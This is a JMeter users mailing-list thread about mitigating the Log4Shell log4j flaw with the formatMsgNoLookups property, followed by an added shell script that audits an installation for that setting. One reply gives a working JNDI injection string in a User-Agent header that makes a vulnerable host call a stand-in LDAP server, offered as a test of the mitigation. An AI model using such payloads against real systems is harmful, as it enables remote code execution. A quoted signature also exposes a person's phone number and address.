I mean, the setting works. Try (without the setting) to build a plan that has
the header User-Agent: ${jndi:ldap://foo.org/attack} in the HTTP Header
Manager of an HTTP sampler and execute the script. The script hangs and after
a few dozen seconds you will see a ConnectException to the foo.org server in
the console logs. The risk of someone attacking you in JMeter in this way
is small (you must follow an unknown plan).
Mariusz
On Wed, 15 Dec 2021 at 18:43, Yevgeniy Grimaylo
<[email protected]> wrote:
> Hello,
>
> Would you please clarify how adding the next line to the *system.properties*
> file (which lives in the "bin" folder of your JMeter installation) mitigates
> the security risk with log4j2?
>
>
>
> Thanks,
>
> Yevgeniy Grimaylo
>
>
>
> *From: *Mariusz W <[email protected]>
> *Reply-To: *JMeter Users List <[email protected]>
> *Date: *Wednesday, December 15, 2021 at 4:09 AM
> *To: *JMeter Users List <[email protected]>
> *Subject: *Re: Jmeter Log4J
>
>
>
> I tested it and it works :)
>
> *-Dlog4j2.formatMsgNoLookups=true*
>
>
>
> Regards,
>
> Mariusz
>
>
>
> On Tue, 14 Dec 2021 at 16:45, Dmitri T <[email protected]> wrote:
>
> It should be sufficient to add the next line to the *system.properties* file
> (which lives in the "bin" folder of your JMeter installation):
>
> *log4j2.formatMsgNoLookups=true*
>
> or pass this property via the -D command-line argument, like:
>
> *jmeter -Dlog4j2.formatMsgNoLookups=true -n -t .....*
>
> More information:
>
> - Constants.java from log4j 2.13.3
>   <https://github.com/apache/logging-log4j2/blob/log4j-2.13.3/log4j-core/src/main/java/org/apache/logging/log4j/core/util/Constants.java#L63>
> - Configuring JMeter
>   <https://jmeter.apache.org/usermanual/get-started.html#configuring_jmeter>
> - Apache JMeter Properties Customization Guide
>   <https://www.blazemeter.com/blog/apache-jmeter-properties-customization>
> - Overriding Properties Via The Command Line
>   <https://jmeter.apache.org/usermanual/get-started.html#override>
>
>
>
> On 12/14/2021 12:40 PM, Smruti Ranjan Roul wrote:
>
> Hi Team,
>
>
>
> With the recent vulnerabilities identified in Apache Log4j on 10th
> December, I wanted to know if there will be a new version of Apache
> JMeter planned with the latest log4j versions.
>
>
>
> Per the organization's security policy, there will be a scan on log4j.
> We know this will not have any impact with the vulnerability identified,
> but providing the InfoSec team with a confirmation email from the
> provider would add confidence.
>
>
>
> Thanks in advance.
>
>
>
> Thanks, and Regards,
> Smruti Ranjan Roul
> Technical Lead- *QA*
>
>
> First American (India) Private Limited
> “Aveda Meta”, No.184, Old Madras Road,
> Opp. Swami Vivekanand Metro Station,
> Indiranagar, Bangalore-560038, Karnataka, India
>
> Mobile : + 91 8880138672
> Email : [email protected]
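Added example, not code from this thread or from the JMeter project: a POSIX shell script that audits a JMeter installation for the mitigation Dmitri describes above. It reads the log4j-core version from the jar name in lib/, decides whether that version honors log4j2.formatMsgNoLookups, and checks or idempotently appends the line to bin/system.properties. It assumes the stock layout (lib/log4j-core-<version>.jar and bin/system.properties) and compares major.minor only. One caveat the thread does not spell out: the property only exists from log4j 2.10.0, so on an older log4j-core it is silently ignored, and from 2.15.0 message lookups are off by default (removed in 2.16.0), so on a current jar the flag is moot; Apache's guidance is to upgrade rather than rely on the flag.

```sh
#!/bin/sh
# Added example (not from the thread or the JMeter project): audit a JMeter
# home for the log4j2.formatMsgNoLookups mitigation discussed on the list.
# Assumed layout: $JMETER_HOME/lib/log4j-core-<version>.jar and
# $JMETER_HOME/bin/system.properties, as in a stock install.

# Print the version embedded in a log4j-core jar name,
# e.g. lib/log4j-core-2.13.3.jar -> 2.13.3
log4j_core_version() {
  name=$(basename "$1" .jar)
  printf '%s\n' "${name#log4j-core-}"
}

# Return 0 if log4j version $1 honors log4j2.formatMsgNoLookups.
# The flag exists from 2.10.0; from 2.15.0 message lookups are off by default
# and from 2.16.0 they are removed, so it only matters for 2.10 <= v < 2.15.
# (major.minor only; the 2.3.x / 2.12.x backport lines need a separate check.)
honors_no_lookups_flag() {
  major=${1%%.*}
  rest=${1#*.}
  minor=${rest%%.*}
  if [ "$major" -eq 2 ] && [ "$minor" -ge 10 ] && [ "$minor" -lt 15 ]; then
    return 0
  fi
  return 1
}

# Return 0 if properties file $1 sets log4j2.formatMsgNoLookups=true
# (a commented-out line or "=false" does not count; '=' or ':' separator).
property_set() {
  grep -Eq '^[[:space:]]*log4j2\.formatMsgNoLookups[[:space:]]*[=:][[:space:]]*true[[:space:]]*$' "$1" 2>/dev/null
}

# Append the property to file $1 unless it is already set (idempotent).
ensure_property() {
  if ! property_set "$1"; then
    printf '\n# Log4Shell mitigation, see JMeter users list thread\nlog4j2.formatMsgNoLookups=true\n' >> "$1"
  fi
}

# Classify JMeter home $1. Prints one of:
#   no-log4j-core | flag-not-supported | flag-not-relevant | mitigated | unmitigated
assess_jmeter_home() {
  home=$1
  jar=$(ls "$home"/lib/log4j-core-*.jar 2>/dev/null | head -n 1)
  if [ -z "$jar" ]; then
    echo no-log4j-core
    return 0
  fi
  ver=$(log4j_core_version "$jar")
  major=${ver%%.*}
  rest=${ver#*.}
  minor=${rest%%.*}
  if [ "$major" -lt 2 ] || { [ "$major" -eq 2 ] && [ "$minor" -lt 10 ]; }; then
    echo flag-not-supported   # older than 2.10: the property is ignored, upgrade
    return 0
  fi
  if ! honors_no_lookups_flag "$ver"; then
    echo flag-not-relevant    # 2.15+: lookups off by default or removed
    return 0
  fi
  if property_set "$home/bin/system.properties"; then
    echo mitigated
  else
    echo unmitigated          # add the property, or pass -Dlog4j2.formatMsgNoLookups=true
  fi
}

# Usage: sh audit-jmeter-log4j.sh /opt/apache-jmeter-5.4.1
if [ -n "$1" ]; then
  assess_jmeter_home "$1"
fi
```

The property check deliberately rejects a commented-out line, since a "# log4j2.formatMsgNoLookups=true" left behind by an earlier edit is the kind of thing a scanner or a reviewer skims past. For a one-off run the -D form Dmitri shows is equivalent, but it only protects that invocation, whereas the system.properties line covers every start of that installation, including GUI launches.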